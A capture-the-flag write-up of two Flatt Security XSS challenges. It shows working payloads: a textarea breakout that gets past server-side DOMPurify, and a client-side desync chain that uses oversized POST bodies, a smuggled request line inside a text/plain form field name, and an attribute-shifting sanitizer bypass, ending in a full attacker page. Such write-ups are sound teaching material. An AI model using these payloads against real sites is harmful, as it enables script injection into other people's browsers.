---
title: "Flatt Security XSS Challenge"
date: 2024-12-02T13:37:33+01:00
draft: false
categories:
    - XSS
tags:
    - XSS
    - Client-Side Desync
    - mXSS
---

# Flatt Security XSS Challenge

Flatt Security has organized a set of cool challenges containing 3 XSS scenarios. I solved 2 of them.

![<- Not working](/static/HACKING/flatt-0.png)

## Challenge 1 - by [@hamayanhamayan](https://x.com/hamayanhamayan)

![<- Not working](/static/HACKING/flatt-1.png)

In this first challenge we can inject HTML code into the page. The code is sent to the backend and then sanitized using the following approach:

```js
const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');
const window = new JSDOM('').window;
const DOMPurify = createDOMPurify(window);

app.get('/', (req, res) => {
  const message = req.query.message;
  //...
  const sanitized = DOMPurify.sanitize(message);
  res.view("/index.ejs", { sanitized: sanitized });
});
```

The server-side implementation uses DOMPurify, and because the version in use is up-to-date, bypassing it doesn’t seem the goal. The solution to this challenge is actually pretty simple. However, since I initially focused exclusively on the server-side sanitization and approached the task as if it were purely about bypassing DOMPurify, I ended up wasting a lot of time.

That said, actually the time wasn't wasted, I learned a lot about Mutation XSS from [Michał Bentkowski posts](https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/). The <mglyph> trick, in particular, is incredibly fascinating! So, in the end, I don’t regret the time spent. 😄

Initially I thought I would have to develop some variant of the existing bypass techniques, but I was completely wrong. After a chat with [@maitai](https://x.com/MaitaiThe/) I realized that I wasn't having a whole perspective of the challenge. Where is the server placing the code? Is the server even aware of where it's injecting the code?

```html
	<h1>Paper Airplane</h1>
    <p class="message"><%- sanitized %></b></p>
    <form method="get" action="">
        <textarea name="message"><%- sanitized %></textarea>
        <p>
            <input type="submit" value="View 👀" formaction="/" />
        </p>
    </form>
```

User input is reflected in both `<p>` tag and `<textarea>` tag. In the case of `<textarea>`, it is used to display the HTML syntax and then is sanitized. But what can we do with this?

The DOMPurify sanitization does not account that the input is being inserted withing a `<texarea>` tag. This allows us to exploit it by closing the `<textarea>` tag using `</textarea>` and injecting new content outside of it. 

For example, we can inject an image tag with an event handler (like onerror), which won't be sanitized because it is interpreted as part of an id attribute in an `<a>` tag. Here’s how this works:

```html
<!-- safe -->
<a id="</textarea><img src=x onerror=alert(1)>">

<!-- unsafe -->

<textarea name="message"> <a id=" </textarea>
<img src=x onerror=alert(1)>">
</textarea>
```

![<- Not working](/static/HACKING/flatt-2.png)

## Challenge 2 - by [@ryotkak](https://x.com/ryotkak)

This challenge is more complex than the first one, this amazing challenge from ryotkak features a "super safe" HTML editor:

![<- Not working](/static/HACKING/flatt-3.png)

When the user presses the "Save" button, the server triggers a handler for the POST request. Here’s the relevant code:

```py
def do_POST(self):
    content_length = int(self.headers.get('Content-Length'))
    if content_length > 100:
        self.send_response(413)
        self.send_data(self.content_type_text, b'Post is too large')
        return
    body = self.rfile.read(content_length)
    draft_id = str(uuid4())
    drafts[draft_id] = body.decode('utf-8')
    self.send_response(200)
    self.send_data(self.content_type_text, bytes(draft_id, 'utf-8'))
```

The server only accepts body content that is less than 100 bytes; otherwise, it will throw an error. If the content length is within the permitted limit, the server will read the content, store it, and respond to the user with a `draft_id`.

This `draft_id` will be used later to request the API:

```py
    def do_GET(self):
        parsed_path = urlparse.urlparse(self.path)
        path = parsed_path.path
        query = urlparse.parse_qs(parsed_path.query)
        if path == "/":
            # ...
        elif path == "/api/drafts":
            draft_id = query.get('id', [''])[0]
            if draft_id in drafts:
                escaped = html.escape(drafts[draft_id])
                self.send_response(200)
                self.send_data(self.content_type_text, bytes(escaped, 'utf-8'))
            else:
                self.send_response(200)
                self.send_data(self.content_type_text, b'')
```

If a request is made to `/api/drafts` the server will search the content corresponding to `draft_id` and `html.escape()`, if the `draft_id` doesn't exist an empty response will be sent. 

Luckily for us, there is also a `404` handler:

```py
def do_GET(self):
    parsed_path = urlparse.urlparse(self.path)
    path = parsed_path.path
    query = urlparse.parse_qs(parsed_path.query)
    # ...
    else:
        self.send_response(404)
        self.send_data(self.content_type_text, bytes('Path %s not found' % self.path, 'utf-8'))
```

As we can see the path value is reflected and it's not being sanitized.

```
curl "localhost:3002/<img>"
Path /<img> not found
```

Cool! But since the content type of this is `text/plain` this won't be enough to achieve XSS. 

Have you ever heard about Client Side Desync? This attack makes the victim's web browser desynchronize its own connection to the vulnerable website. This is explained in great detail in the [PortSwigger blog](https://portswigger.net/web-security/request-smuggling/browser/client-side-desync).

But how does this happen? To understand this, let’s take a closer look at the POST handler:

```py
def do_POST(self):
    content_length = int(self.headers.get('Content-Length'))
    if content_length > 100:
        self.send_response(413)
        self.send_data(self.content_type_text, b'Post is too large')
        return
    body = self.rfile.read(content_length) # <-------
    draft_id = str(uuid4())
    drafts[draft_id] = body.decode('utf-8')
    self.send_response(200)
    self.send_data(self.content_type_text, bytes(draft_id, 'utf-8'))
```

This is interesting! The body content is not consumed if the content length is larger than 100 bytes. When a POST request is made, the client first sends an HTTP POST request to the server. This includes the headers (such as `Content-Length`) and the body data. The entire request is written to the server socket. Then, the server reads the content from the socket, but what if the server stops reading before consuming the entire body? The body data remains in the socket's receive buffer, waiting to be read! When the server later decides to read from the socket, it will start reading from where it left off.

If this sounds similar to request smuggling, you're right! It’s quite similar but only requires a single server, unlike classic request smuggling, which involves both a proxy and a server.

So, how can we prove this vulnerability? If we make a request to a vulnerable endpoint with the payload as body and then make another request to a different endpoint, this second endpoint will show with the content from the payload of the request. This may sound confusing so let's look at the server to understand it better.

Open the console from dev tools and run the following code:

```js
fetch('http://localhost:3002/api/drafts', {
method: 'POST',
    body: "GET /maiky_smuggler HTTP/1.1\r\nX: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",  
}).then(() => {
    location = 'http://localhost:3002/' 
})
```

This will send a POST request to `/api/drafts` with a body longer than 100 bytes, causing the server to ignore the body and return a `413` status code. Then, it will change the location to the index page, poisoning the connection. 

![<- Not working](/static/HACKING/flatt-4.png)

It looks like nothing changed, but try to reload the page...

![<- Not working](/static/HACKING/flatt-5.png)

OMG. `http://localhost:3002/` was poisoned with the payload of the request made to `/api/drafts`. This is interesting but I still don't know how to take advantage of this to achieve XSS. 

If we check the DOM, the content is loaded to the page by requesting `/api/drafts`:

```js
window.onload = async function () {
    const params = new URLSearchParams(window.location.search);
    if (params.has('draft_id')) {
        const resp = await fetch(`/api/drafts?id=${encodeURIComponent(params.get('draft_id'))}`);
        const content = await resp.text();
        document.getElementById('input').value = content.slice(0, 100);
        previewContent();
    }
}
```

And since the sanitization of the draft is made server-side, if we manage to poison the `/api/drafts` endpoint, we can smuggle unsanitized arbitrary HTML! To do that, we can use the following code in the console:

```js
fetch('http://localhost:3002/', {
    method: 'POST',
    body: `GET /maiky HTTP/1.1
X: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa`
}).then(() => {
    location = 'http://localhost:3002/api/drafts?id=2c73420c-826f-4bab-8efd-733cc7278ffc'
}).then(() => {
    location = 'http://localhost:3002/?draft_id=2c73420c-826f-4bab-8efd-733cc7278ffc'
}) 
```

![<- Not working](/static/HACKING/flatt-6.png)

We did it! But for obvious reasons, we can't open the console from the victim browser and execute that. To trigger the client-side desync, we can start including the vulnerable website within an iframe.

```html
<html>
    <body>
        <iframe name="vict" src="http://localhost:3002/"></iframe>
    </body>
</html>
```

Cool, now add a `<script>` tag and send a POST request with fetch to poison the connection:

```js
fetch('http://localhost:3002/', {
    method: 'POST',
    body: `GET /maiky HTTP/1.1
X: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa`
}).then(() => {
    location = 'http://localhost:3002/api/drafts?id=2c73420c-826f-4bab-8efd-733cc7278ffc'
}).then(() => {
    location = 'http://localhost:3002/?draft_id=2c73420c-826f-4bab-8efd-733cc7278ffc'
}) 
```

But this did not work :(

There is a detail I completely forgot: the server does not have a permissive CORS.

```
Access to fetch at 'http://localhost:3002/' (server) from origin 'http://localhost:8989' (attacker) has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource. If an opaque response serves your needs, set the request's mode to 'no-cors' to fetch the resource with CORS disabled.
```

At this moment I was pretty stuck because I could fix that error using `mode: "no-cors"` but I couldn't manage to poison the connection. So, I started thinking of another way to send the request. 

Using `<form>` should work since forms are usually used to send POST requests between different sites. We want to send `text/plain` as the content type instead of `application/x-www-form-urlencoded`, so I did a quick GPT-ask and got the solution.

![<- Not working](/static/HACKING/flatt-7.jpeg)

We can successfully achieve that using:

```js
        const iframe = document.createElement('iframe');
        iframe.name = 'hiddenFrame';
        document.body.appendChild(iframe);

        const form = document.createElement('form');
        form.method = 'POST';
        form.action = 'http://localhost:3002/'; 
        form.enctype = 'text/plain'; // RAW

        // textarea for raw data
        const textarea = document.createElement('textarea');
        textarea.name = 'payload'; 
        textarea.textContent = `GET /<maiky> HTTP/1.1
X: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa`;

        form.appendChild(textarea);
        document.body.appendChild(form);
        form.submit();
```

The problem we have now is that we're receiving the following request body:

```
payload=GET /<maiky> HTTP/1.1
X: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
```

But we can just remove the name to the textarea right? 

```js
textarea.name = 'payload';  // remove this
```

But if we remove that, the body won't be sent 😔. But we can try to inject there, right? We can set the name to `GET /<...`:

```js
textarea.name = `GET /<img/i/src/y/onerror=alert(origin)> HTTP/1.1
            X: xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaxaa`
```

```
GET /<maiky> HTTP/1.1
X: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
```

It worked! We can see that the `=` is appended to the end of the `X` header. Since I was using that header to fill the 100 chars, it's okay to have the `=` there. Now our code works, but there is one last barrier to achieving XSS: the (not)just-in-case `sanitizeHtml`.


```js
document.getElementById('preview').innerHTML = sanitizeHtml(input); // just in case

function sanitizeHtml(html) {
    const doc = new DOMParser().parseFromString(html, "text/html");
    const nodeIterator = doc.createNodeIterator(doc, NodeFilter.SHOW_ELEMENT);

    while (nodeIterator.nextNode()) {
        const currentNode = nodeIterator.referenceNode;
        if (typeof currentNode.nodeName !== "string" || !(currentNode.attributes instanceof NamedNodeMap) || typeof currentNode.remove !== "function" || typeof currentNode.removeAttribute !== "function") {
            console.warn("DOM Clobbering detected!");
            return "";
        }
        if (SANITIZER_CONFIG.DANGEROUS_TAGS.includes(currentNode.nodeName.toLowerCase())) {
            currentNode.remove();
        } else if (!SANITIZER_CONFIG.ALLOW_ATTRIBUTES && currentNode.attributes) {
            for (const attribute of currentNode.attributes) {
                currentNode.removeAttribute(attribute.name);
            }
        }
    }

    return doc.body.innerHTML;
}
```

To be honest, when I saw this at first, I felt super lazy to debug this, so I started trying payloads instead of understanding what the code does (don't be like `maiky`), but I was lucky because when trying the following payload:

```js
sanitizeHtml("<img/src/onerror=alert(1)>")
// <img onerror="alert(1)">
```

I thought that **attributes** were removed but not the **events** (this is not true, I was doing black box testing), so I could achieve **XSS** using ``<div onmouseover="alert(document.origin)">``. But since this requires user interaction, this payload was not valid for the challenge.

After some more testing, I realized that it was not relevant if it is an **attribute** or **event**:

```js
sanitizeHtml("<img/onerror/src=x>")
// <img src="x">
```

Why is this vulnerable? The issue arises because the loop over attributes:

```js
for (const attribute of currentNode.attributes) {
    currentNode.removeAttribute(attribute.name);
}
```

This loop modifies the `attributes` collection during iteration, leading to unexpected behavior where attributes like `onerror` could "shift" into the place of removed attributes like `src`.

```js
sanitizeHtml("<img foo src=x boo onerror=alert(1)>")
// <img src="x" onerror="alert(1)">
```

Summing up we can build our final payload:

```html
<html>
    <body>
        <iframe name="vict" src="http://localhost:3002/"></iframe>

        <script>
                function sendReq() {
                    const ifr = document.createElement('iframe');
                    ifr.name = 'hiddenFrame';
                    document.body.appendChild(ifr);

                    const form = document.createElement('form');
                    form.method = 'POST';
                    form.action = 'http://localhost:3002/'; 
                    form.target = 'hiddenFrame';
                    form.enctype = 'text/plain'; 

                    const textarea = document.createElement('textarea');
                    textarea.name = `GET /<img/i/src/y/onerror=alert(document.origin)> HTTP/1.1
            X: xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaxaa`; 
                    textarea.textContent = ``;

                    form.appendChild(textarea);
                    document.body.appendChild(form);

                    form.submit();
                }
                sendReq()
                vict.location.href = "http://localhost:3002/api/drafts?id=2c73420c-826f-4bab-8efd-733cc7278ffc"
                vict.location.href = "http://localhost:3002/?draft_id=2c73420c-826f-4bab-8efd-733cc7278ffc"
        </script>
    </body>
</html>
```

![<- Not working](/static/HACKING/flatt-8.png)

## Challenge 3 - by [@kinugawamasato](https://x.com/kinugawamasato)

Sadly, I couldn't achieve solving this last challenge :(. But here is the solution to the challenge (along with the first two challenges) from super-[@maitai](https://blig.one/2024/11/29/flatt-xss-writeup.html)! Amazing job!

# THANKS FOR READING!!